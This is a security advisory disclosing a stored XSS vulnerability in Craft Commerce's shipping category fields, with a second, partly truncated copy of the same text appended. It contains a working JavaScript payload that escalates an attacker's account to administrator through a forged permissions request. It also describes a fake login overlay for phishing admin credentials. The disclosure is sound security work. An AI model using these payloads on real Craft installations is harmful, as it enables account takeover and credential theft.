Summary
A stored XSS vulnerability in Craft Commerce allows attackers to execute malicious JavaScript in an administrator’s browser. This occurs because the Shipping Categories (Name & Description) fields in the Store Management section are not properly sanitized before being displayed in the admin panel.
Proof of Concept
Requirments
- General permissions:
- Access the control panel
- Access Craft Commerce
- Craft Commerce permissions:
- Manage store settings
- Manage shipping
- An active administrator elevated session
Steps to Reproduce
- Log in to the Admin Panel with the attacker account with the permissions mentioned above.
- Navigate to Commerce -> Store Management -> Shipping Categories (
/admin/commerce/store-management/primary/shippingcategories).
- Create a new shipping category.
- In the Name field, enter the following payload:
<img src=x onerror="alert(document.domain)">
- Click Save & Go back to the previous page.
- Notice the alert proving JavaScript execution.
Privilege Escalation to Administrator:
- Do the same steps above, but replace the payload with a malicious one.
- The following payload elevates the attacker’s account to Admin if there’s already an elevated session, replace the
<UserID> with your attacker id:
<img src=x onerror="fetch('/admin/users/<UserID>/permissions',{method:'POST',body:`CRAFT_CSRF_TOKEN=${Craft.csrfTokenValue}&userId=<UserID>&admin=1&action=users/save-permissions`,headers:{'content-type':'application/x-www-form-urlencoded'}})">
- In another browser, log in as an admin & go to the vulnerable page (shipping categories page).
- Go back to your attacker account & notice you are now an admin.
The privilege escalation requires an elevated session. In a real-world scenario, an attacker can automate the process by forcing a logout if the victim’s session is stale; upon re-authentication, the stored XSS payload executes within a fresh elevated session to complete the attack.
Or even easier (and smarter), an attacker (using the XSS) can create a fake 'Session Expired' login modal overlay. Since it’s on the trusted domain, administrators will likely enter their credentials, sending them directly to the attacker.
References:
fa27333
Summary
A stored XSS vulnerability in Craft Commerce allows attackers to execute malicious JavaScript in an administrator’s browser. This occurs because the Shipping Categories (Name & Description) fields in the Store Management section are not properly sanitized before being displayed in the admin panel.
Proof of Concept
Requirments
Steps to Reproduce
/admin/commerce/store-management/primary/shippingcategories).Privilege Escalation to Administrator:
<UserID>with your attacker id:The privilege escalation requires an elevated session. In a real-world scenario, an attacker can automate the process by forcing a logout if the victim’s session is stale; upon re-authentication, the stored XSS payload executes within a fresh elevated session to complete the attack.
Or even easier (and smarter), an attacker (using the XSS) can create a fake 'Session Expired' login modal overlay. Since it’s on the trusted domain, administrators will likely enter their credentials, sending them directly to the attacker.
References:
fa27333